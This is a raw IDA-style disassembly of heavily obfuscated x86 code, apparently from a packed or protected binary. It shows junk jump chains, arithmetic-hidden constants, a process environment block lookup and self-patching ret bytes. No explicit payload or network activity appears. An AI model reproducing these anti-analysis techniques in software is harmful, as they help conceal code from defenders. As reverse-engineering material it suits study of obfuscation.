; FUNCTION CHUNK AT 00455EC8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455F1C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045600D SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045605B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004560E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045632A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456340 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00456498 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045652B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004565E1 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00456605 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00456629 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004566FA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004567E7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456866 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00456962 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004569B8 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00456C71 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00456D2E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457021 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004571C9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004573EF SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00457479 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00457AA3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457C58 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457CDA SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00457E2B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457E67 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00457EFD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457F23 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00458156 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458255 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045836D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004583E6 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045842B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045846C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458941 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00458B4F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00458B65 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458F4B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004590EC SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004591CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045937C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00459413 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004598D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459940 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459A2B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459C5D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459DE3 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00459FB6 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045A175 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A3F3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A4CB SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045A9FF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045ADE2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045AFA3 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045AFEC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045B0D1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B110 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0045B1F3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045B61A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045B749 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045B8CB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045BAD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BD42 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BD5F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045C174 SIZE 0000000B BYTES

		xchg	edi, [esp+4+var_4]
		pop	edi
		push	324BF6B8h
		pop	edx
		or	edx, 8DF6BFE5h
		jmp	loc_445547
; ---------------------------------------------------------------------------

loc_44523B:				; CODE XREF: y2kk37jd:loc_445F4Bj
					; y2kk37jd:004516A6j
		and	ecx, 50F7E360h
		add	ecx, 0AF80AC49h
		xchg	ecx, [esp+0]
		jmp	sub_447E2D
; ---------------------------------------------------------------------------

loc_44524F:				; CODE XREF: sub_445BE8:loc_43C5E5j
		add	eax, 0A05C1AE2h
		xchg	eax, [esp+0]
		jmp	loc_43F9F0
; ---------------------------------------------------------------------------

loc_44525D:				; CODE XREF: sub_449E69+118DBj
		jl	loc_459FB6
		jmp	loc_452EC7
; ---------------------------------------------------------------------------

loc_445268:				; DATA XREF: sub_444D6F+16149o
		call	sub_454413
		jmp	loc_4583D1
; ---------------------------------------------------------------------------
		jmp	loc_457EF2
; ---------------------------------------------------------------------------

loc_445277:				; CODE XREF: sub_43F0A5:loc_4559EBj
					; sub_43F0A5:loc_459A33p
		mov	eax, large fs:18h
		mov	eax, [eax+30h]
		jmp	loc_43CDD9
; ---------------------------------------------------------------------------

loc_445286:				; DATA XREF: sub_43F4CE+14BF8o
		xchg	edi, [esp+0]
		call	sub_445116

loc_44528E:				; CODE XREF: sub_443525+AC49j
		adc	ecx, 728DCA9h
		jge	loc_4548B6
		or	edx, 6D6FED1Ah

loc_4452A0:				; CODE XREF: sub_443525:loc_44E162j
		xor	ecx, 648AB64Bh
		jns	loc_44E2F5

loc_4452AC:				; CODE XREF: sub_43F3BF+Bj
		jmp	loc_43E158
; ---------------------------------------------------------------------------
		push	eax
		jmp	loc_459940
; ---------------------------------------------------------------------------

loc_4452B7:				; CODE XREF: sub_43E456:loc_44E9F2j
		jns	loc_44C48C

loc_4452BD:				; CODE XREF: y2kk37jd:0044EF06j
		jmp	loc_4409D8
; ---------------------------------------------------------------------------
		jg	loc_456C71
		test	eax, edx
		jmp	loc_450702
; ---------------------------------------------------------------------------

locret_4452CF:				; CODE XREF: sub_44D627:loc_455B24j
		retn
; ---------------------------------------------------------------------------

loc_4452D0:				; CODE XREF: y2kk37jd:0045957Ej
		jmp	loc_445D2B
; ---------------------------------------------------------------------------

loc_4452D5:				; CODE XREF: sub_4568B4+15j
		jmp	loc_459C5D
; ---------------------------------------------------------------------------

loc_4452DA:				; CODE XREF: y2kk37jd:00440A8Ej
		jmp	loc_452B5F
; ---------------------------------------------------------------------------

loc_4452DF:				; CODE XREF: sub_45689F-14576j
		add	esi, 87CF30BFh
		xor	esi, 675FA988h
		add	esi, 0B0DC2CC9h
		popf
		xchg	esi, [esp+0]
		jmp	loc_455469
; ---------------------------------------------------------------------------

loc_4452FA:				; CODE XREF: sub_45BC3F-325Aj
		and	edi, esi

loc_4452FC:				; CODE XREF: sub_45BC3F:loc_448912j
		push	0CBC8B945h
		pop	eax
		or	eax, 46185099h
		sub	eax, 6D6A642Ah
		xor	eax, 0A6717163h
		add	eax, ebp
		jmp	loc_44EA3A
; ---------------------------------------------------------------------------

loc_44531B:				; CODE XREF: sub_453E7Aj
					; DATA XREF: sub_4599BE:loc_453E70o
		sub	al, 99h
		push	offset loc_454C5A
		jmp	nullsub_40
; ---------------------------------------------------------------------------

loc_445327:				; CODE XREF: sub_44145C+14j
		cmp	edi, 36B69B40h
		jmp	loc_457AA3
; ---------------------------------------------------------------------------

locret_445332:				; CODE XREF: y2kk37jd:loc_43E7BFj
		retn
; ---------------------------------------------------------------------------
		xor	edi, 83134D03h
		jmp	sub_43C044
; ---------------------------------------------------------------------------

loc_44533E:				; CODE XREF: sub_44255B:loc_444AEEj
		mov	eax, [eax+18h]
		dec	eax
		push	offset loc_45A69A
		jmp	nullsub_452
; ---------------------------------------------------------------------------

loc_44534C:				; CODE XREF: sub_43D0C9+1C4E7j
		push	edx
		call	sub_447041
		push	0EC6AE41Eh
		pop	eax
		jmp	loc_44812E
; ---------------------------------------------------------------------------

loc_44535D:				; CODE XREF: sub_43E679+3454j
		jz	loc_43F933
		jmp	loc_45AFA3
; ---------------------------------------------------------------------------

locret_445368:				; CODE XREF: sub_457F0C:loc_459DD4j
		retn
; ---------------------------------------------------------------------------

loc_445369:				; CODE XREF: sub_442829+14B52j
		jmp	loc_43CC56
; ---------------------------------------------------------------------------

loc_44536E:				; CODE XREF: sub_44F086+Aj
		jmp	loc_45BD5F
; ---------------------------------------------------------------------------

loc_445373:				; CODE XREF: sub_445226+19Bj
		jz	loc_43B6B3
		xor	edi, edx

loc_44537B:				; CODE XREF: sub_457FAC:loc_457FB1j
		jmp	loc_43B6B1
; ---------------------------------------------------------------------------

loc_445380:				; CODE XREF: y2kk37jd:00446844j
		xor	eax, 68E44667h
		and	ecx, ebp
		mov	ebp, ebx

loc_44538A:				; CODE XREF: sub_44107E:loc_446836j
		rol	ecx, 16h
		or	ecx, 9C24620Fh
		rol	ecx, 1Fh
		add	ecx, 10C5385h
		mov	[ecx], eax
		jmp	loc_451011
; ---------------------------------------------------------------------------

loc_4453A3:				; CODE XREF: y2kk37jd:0045AF3Aj
		and	ecx, edx

loc_4453A5:				; CODE XREF: y2kk37jd:004545C6j
		mov	esi, ebx
		sbb	ebx, 0A8FB0BACh
		xor	ecx, edi

loc_4453AF:				; CODE XREF: sub_44CDD5+E157j
		add	eax, ds:4000EDh
		and	eax, 87D129D4h
		test	eax, 1000h
		jmp	loc_445373
; ---------------------------------------------------------------------------

loc_4453C6:				; CODE XREF: y2kk37jd:loc_447E94j
		jnz	loc_4503F8
		jmp	loc_44CA9E
; ---------------------------------------------------------------------------

loc_4453D1:				; DATA XREF: sub_4464B3+3o
		xchg	eax, [esp+0Ch+var_C]
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		jmp	loc_44DAEC
; ---------------------------------------------------------------------------
		jge	loc_446B62
		jmp	sub_4534CC
; ---------------------------------------------------------------------------
		rol	ebp, 7
		jmp	loc_4459B7
; ---------------------------------------------------------------------------

loc_4453F7:				; CODE XREF: y2kk37jd:00442765j
		mov	esi, 2AA6FBB9h
		jmp	sub_44B9BD
; ---------------------------------------------------------------------------
		pop	edi
		jmp	sub_45A2F9
; ---------------------------------------------------------------------------

loc_445407:				; CODE XREF: sub_43CB44:loc_43EA86j
		xchg	ebx, [esp+0Ch+var_C]
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		pop	ebp
		push	775000FDh
		pop	eax
		jmp	loc_43F842
; ---------------------------------------------------------------------------

loc_44541B:				; CODE XREF: y2kk37jd:0043F8B2j
		test	ebx, eax
		jmp	loc_458B4F
; ---------------------------------------------------------------------------

loc_445422:				; CODE XREF: sub_44B4E1-9E37p
					; y2kk37jd:0045A85Aj
		xchg	eax, [esp+0Ch+var_C]
		pop	eax
		add	esi, ebp
		push	eax
		push	8657C3F9h
		pop	eax
		and	eax, 0C626BD32h
		jmp	loc_449CF8
; ---------------------------------------------------------------------------

loc_44543A:				; CODE XREF: sub_45454E:loc_4585D9j
		or	eax, 53533724h
		xor	eax, 0ABF7F639h
		add	eax, ebp
		add	eax, 0ABFB7E43h
		push	eax
		jmp	loc_4400D8
; ---------------------------------------------------------------------------

loc_445454:				; CODE XREF: sub_45742F-9CE1j
		test	edi, edx
		jmp	loc_44D55C
; ---------------------------------------------------------------------------

loc_44545B:				; CODE XREF: sub_442C3Ej
		mov	edx, ds:dword_440314
		or	edx, edx
		jnz	loc_440301
		jmp	loc_446D6F
; ---------------------------------------------------------------------------

loc_44546E:				; CODE XREF: y2kk37jd:0044FAC4j
		xchg	ebp, eax
		jl	loc_44F873
		not	ebx
		mov	eax, edi
		jmp	loc_452C78
; ---------------------------------------------------------------------------

loc_44547F:				; CODE XREF: sub_45A22C-CE6Cj
		sbb	ebx, 0E15F372Bh
		mov	ebp, 3040E6B5h
		jge	loc_44961F
		jmp	loc_44FC3B
; ---------------------------------------------------------------------------

loc_445495:				; CODE XREF: y2kk37jd:loc_450EC2j
		sub	al, 99h
		push	0A6B84130h
		pop	edx
		sub	edx, 12A089BDh
		and	edx, 2B781242h
		jmp	loc_4438AC
; ---------------------------------------------------------------------------

loc_4454AE:				; CODE XREF: y2kk37jd:004565A6j
		jno	loc_44D977
		rol	eax, 1Dh

loc_4454B7:				; CODE XREF: y2kk37jd:00444DDFp
		xchg	edx, [esp+10h+var_10]
		pop	edx
		mov	eax, [esp+0Ch+var_C]
		call	sub_451D24

loc_4454C3:				; CODE XREF: sub_442F42+112AAj
		jmp	sub_442F42
; ---------------------------------------------------------------------------

loc_4454C8:				; CODE XREF: sub_44700D+Ej
		jmp	loc_454A3E
; ---------------------------------------------------------------------------

loc_4454CD:				; CODE XREF: sub_442A84-3818j
		add	eax, 0C9810347h
		mov	eax, [eax]
		mov	dx, [eax+2]
		push	0D35AECA1h
		push	offset sub_43B4F9
		jmp	loc_4483B0
; ---------------------------------------------------------------------------

loc_4454E8:				; DATA XREF: sub_456BA1+1o
		xchg	esi, [esp+0]
		jmp	sub_440CD1
; ---------------------------------------------------------------------------

loc_4454F0:				; CODE XREF: y2kk37jd:0043DE3Dj
		xchg	ebx, [edx]
		test	esi, 0E8803C81h
		jmp	loc_44F6BF
; ---------------------------------------------------------------------------
		jmp	ds:off_41E118
; ---------------------------------------------------------------------------

loc_445503:				; CODE XREF: y2kk37jd:00458D7Dj
		jmp	loc_450A07
; ---------------------------------------------------------------------------

loc_445508:				; CODE XREF: sub_43EE8A+156AAj
		jmp	loc_4527EF
; ---------------------------------------------------------------------------

loc_44550D:				; CODE XREF: sub_43C054+AD72j
		jmp	loc_45632A
; ---------------------------------------------------------------------------

loc_445512:				; CODE XREF: sub_45A47C:loc_448847j
					; sub_4490B4+32C8j ...
		push	offset loc_44DCE2
		jmp	nullsub_42
; ---------------------------------------------------------------------------

locret_44551C:				; CODE XREF: sub_44E9A8:loc_44D9ACj
		retn
; ---------------------------------------------------------------------------

loc_44551D:				; CODE XREF: y2kk37jd:004486D4j
		sub	ecx, esi
		pushf

loc_445520:				; CODE XREF: sub_44B814:loc_4486BCj
		rol	esi, 13h
		push	offset loc_453C46
		jmp	loc_44F9E5
; ---------------------------------------------------------------------------

loc_44552D:				; CODE XREF: sub_4448E2+15310j
		xor	edx, 0BA608B71h
		add	edx, ebp
		add	edx, 7D5EE6C9h
		mov	[edx], eax
		call	sub_43FE51

loc_445542:				; CODE XREF: sub_449129+1E08j
		jmp	loc_4573EF
; ---------------------------------------------------------------------------

loc_445547:				; CODE XREF: sub_445226+10j
		jmp	loc_4522ED
sub_445226	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438B1

loc_44554C:				; CODE XREF: sub_4438B1+6j
		jmp	loc_44C63B
; END OF FUNCTION CHUNK	FOR sub_4438B1
; ---------------------------------------------------------------------------

loc_445551:				; CODE XREF: y2kk37jd:0045B93Cj
		ja	loc_43E81F

; =============== S U B	R O U T	I N E =======================================



sub_445557	proc near		; CODE XREF: sub_44CDD5+CDD5p

; FUNCTION CHUNK AT 00445778 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C25B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457192 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004588FB SIZE 00000016 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		pop	eax
		push	eax
		push	eax
		push	0AE7A841Ch
		jmp	loc_457192
sub_445557	endp


; =============== S U B	R O U T	I N E =======================================



sub_445568	proc near		; DATA XREF: sub_445226:loc_43E30Bo

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B7AA SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043C9A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E092 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F8D8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00440C6F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044193A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00442A45 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00443C1E SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00445B0B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00445C05 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044649D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00449E57 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00449FAA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044A43C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044C003 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C201 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C967 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D708 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DA4A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DEC5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00450438 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00450C2D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00452373 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004525CB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452DCF SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00454C9A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455C08 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00455F0C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455F4F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455FC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458441 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045A04D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045B229 SIZE 0000000B BYTES

		add	eax, 0C32DE67Ah
		mov	eax, [eax]
		push	eax
		call	sub_458FC0
		jmp	loc_455FC1
sub_445568	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDE6

loc_44557B:				; CODE XREF: sub_43FDE6:loc_44A4A8j
		mov	eax, [esp-4+arg_0]
		push	ebx
		mov	ebx, edx
		call	sub_43C498

locret_445586:				; CODE XREF: sub_455BE9-A549j
		retn
; END OF FUNCTION CHUNK	FOR sub_43FDE6
; ---------------------------------------------------------------------------

loc_445587:				; CODE XREF: y2kk37jd:loc_43D74Dj
					; y2kk37jd:0044AE52j
		jmp	loc_45B0DC
; ---------------------------------------------------------------------------

loc_44558C:				; CODE XREF: y2kk37jd:loc_455547j
		add	edx, ebp
		push	eax
		push	0BEC0FB73h
		or	eax, 0E9ED8357h
		jmp	loc_459267
; ---------------------------------------------------------------------------

loc_44559F:				; CODE XREF: y2kk37jd:0045576Dj
		jno	loc_459493

loc_4455A5:				; CODE XREF: y2kk37jd:0045575Aj
		sub	edi, 10EF3BC2h
		add	edi, 0CCAC13E1h
		mov	[edi], eax
		pop	edi
		lea	eax, sub_45BBF8
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A0D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BBF8

loc_4455C2:				; CODE XREF: sub_45BBF8j
		xchg	ecx, [esp+0]
		jmp	loc_444E08
; END OF FUNCTION CHUNK	FOR sub_45BBF8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_454. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4455CB:				; CODE XREF: sub_445226+D5D2j
		jmp	sub_4599BE
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_4455D0:				; CODE XREF: sub_43F346+709j
		shl	ebp, 15h
		mov	[ebp+0], edi
		add	ebx, ebp

loc_4455D8:				; CODE XREF: sub_4599BE:loc_43B9C3j
					; sub_4599BE-19FDEj ...
		jmp	loc_455FEA
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_4455DD:				; CODE XREF: sub_4599BE-C221j
					; sub_43F346+11CC0j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_4599BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458520

loc_4455E0:				; CODE XREF: sub_458520:loc_45852Dj
		jl	loc_43B3FB
; END OF FUNCTION CHUNK	FOR sub_458520
; START	OF FUNCTION CHUNK FOR sub_442F42

loc_4455E6:				; CODE XREF: sub_442F42+112B4j
		jmp	loc_43C17D
; END OF FUNCTION CHUNK	FOR sub_442F42
; ---------------------------------------------------------------------------
		test	edi, ecx
		jmp	loc_44F4C2
; ---------------------------------------------------------------------------

loc_4455F2:				; DATA XREF: sub_43D5FEo
		xchg	ebx, [esp]
		mov	edx, ebx
		pop	ebx
		jo	loc_43E142
		mov	eax, [esp]
		push	offset sub_45C03C
		jmp	loc_45822B
; ---------------------------------------------------------------------------

loc_44560B:				; DATA XREF: sub_4474E2+1o
		mov	[edx], eax
		xchg	ebp, [esp]
		mov	edx, ebp
		pop	ebp
		pushf
		push	0ABAD3530h
		jmp	loc_449F2B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455DDE

loc_44561E:				; CODE XREF: sub_455DDE-1675j
		or	ebp, 6EB703EEh
		jmp	loc_45B9D0
; END OF FUNCTION CHUNK	FOR sub_455DDE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEAB

loc_445629:				; CODE XREF: sub_44CEAB-875Aj
		cmp	edi, 521DA09Eh
		jmp	loc_44E100
; END OF FUNCTION CHUNK	FOR sub_44CEAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A36

loc_445634:				; CODE XREF: sub_456A36:loc_44E768j
		jnz	loc_456CB1
		jmp	loc_456EFD
; END OF FUNCTION CHUNK	FOR sub_456A36
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44563F:				; CODE XREF: sub_4458DD-6B36j
		jz	loc_447CB1
		jl	loc_44D8A3

loc_44564B:				; CODE XREF: sub_4458DD:loc_447F9Dj
		push	8E0872CFh
		pop	eax

loc_445651:				; CODE XREF: sub_454251-E404j
		jmp	loc_455262
; END OF FUNCTION CHUNK	FOR sub_4458DD

; =============== S U B	R O U T	I N E =======================================



sub_445656	proc near		; DATA XREF: sub_45A783-1CD9Do
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_4565B3
		jmp	loc_45B8D1
sub_445656	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_117. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_445666:				; CODE XREF: sub_445226+12AC5j
		jmp	nullsub_286
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_44566B:				; CODE XREF: sub_45689F-150BEj
		jmp	loc_450404
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_445670:				; CODE XREF: sub_43B163:loc_43C50Dj
		call	sub_43B163

loc_445675:				; CODE XREF: sub_44F2FB+9j
		jmp	loc_44E91B
; END OF FUNCTION CHUNK	FOR sub_43B163
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_324. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442938

loc_44567B:				; CODE XREF: sub_442938+14169j
		jmp	loc_45B941
; END OF FUNCTION CHUNK	FOR sub_442938
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_445680:				; CODE XREF: sub_445226:loc_448E9Cj
		jmp	sub_4562F2
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_445685:				; CODE XREF: y2kk37jd:004529C5j
					; sub_44AC89:loc_452AA2j
		shr	ebx, 16h
		rol	ecx, 1Eh
		popf
; END OF FUNCTION CHUNK	FOR sub_44AC89
; START	OF FUNCTION CHUNK FOR sub_455958

loc_44568C:				; CODE XREF: sub_455958:loc_4529B2j
		xor	ecx, 40D472F9h
		jmp	loc_43D825
; END OF FUNCTION CHUNK	FOR sub_455958
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_445697:				; CODE XREF: sub_4507BF-5AB5j
		shl	ecx, 0Ch

loc_44569A:				; CODE XREF: sub_4507BF:loc_44B682j
		push	0
		push	esi
		push	7F0FE3ACh
		jmp	loc_44ED9C
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

loc_4456A7:				; CODE XREF: y2kk37jd:loc_4462CCj
		rol	ecx, 3
		cmp	ecx, 0D8FCDB22h
		jmp	loc_444F88
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4456B5:				; CODE XREF: sub_445226+12C4Aj
		cdq

loc_4456B6:				; CODE XREF: sub_445226:loc_43B9E3j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_45ADE2
		jmp	loc_44C96C
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_483. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4456C8:				; CODE XREF: y2kk37jd:004546FFj
		jmp	loc_442FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_4456CD:				; CODE XREF: sub_454C24:loc_441F97j
		jnz	loc_44D7BF
		jmp	loc_457641
; END OF FUNCTION CHUNK	FOR sub_454C24

; =============== S U B	R O U T	I N E =======================================



sub_4456D8	proc near		; CODE XREF: sub_458DD9+ADEp
					; sub_452441+A0FBj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C4F4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00453196 SIZE 00000005 BYTES

		xchg	ecx, [esp-4+arg_0]
		pop	ecx
		call	sub_4581BB
		push	ecx
		push	22ED5BA6h
		jmp	loc_43C4F4
sub_4456D8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4456EC:				; CODE XREF: y2kk37jd:0044B14Ej
		push	offset sub_44D3E1
		jmp	locret_443970
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45181D

loc_4456F6:				; CODE XREF: sub_45181D+10j
		call	sub_442C3E
		mov	ds:off_41E08C, eax
		lea	eax, sub_4445D2
		mov	byte ptr [eax],	0C3h
		jmp	sub_4445D2
; END OF FUNCTION CHUNK	FOR sub_45181D

; =============== S U B	R O U T	I N E =======================================



sub_44570F	proc near		; CODE XREF: sub_414D0E+1Cp
					; sub_41BF8C+161p ...
		call	sub_4443CD
		jmp	ds:off_41E090
sub_44570F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_44571A:				; CODE XREF: sub_45689F-4065j
		jmp	loc_44F408
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_44571F:				; CODE XREF: sub_43F75D+10F1Cj
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45070F

loc_445724:				; CODE XREF: sub_45070F-1078Bj
		pop	ecx
		pop	edx
		pop	ebp
		retn	0Ch
; END OF FUNCTION CHUNK	FOR sub_45070F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456136

loc_44572A:				; CODE XREF: sub_456136-1AE0Ej
		jmp	loc_444ED2
; END OF FUNCTION CHUNK	FOR sub_456136

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44572F	proc near		; CODE XREF: y2kk37jd:00448D96j
					; y2kk37jd:0044BD10p ...

var_38		= dword	ptr -38h
var_34		= dword	ptr -34h

; FUNCTION CHUNK AT 0043D361 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044135A SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004546A0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004586D1 SIZE 00000008 BYTES

		push	ebp
		mov	ebp, esp
		jns	sub_44F44F
		add	esp, 0FFFFFFD0h
		jmp	loc_4546A0
sub_44572F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_445740:				; CODE XREF: sub_43C851:loc_4597EBj
		jnz	loc_451E05

loc_445746:				; CODE XREF: sub_44D935+1Cj
		jmp	loc_451C5A
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
		not	ebp
		sub	edx, 4088C8F9h
		mov	[eax], edx
		xchg	edx, [esi]
		cmp	ebp, edx
		jmp	loc_451DFF
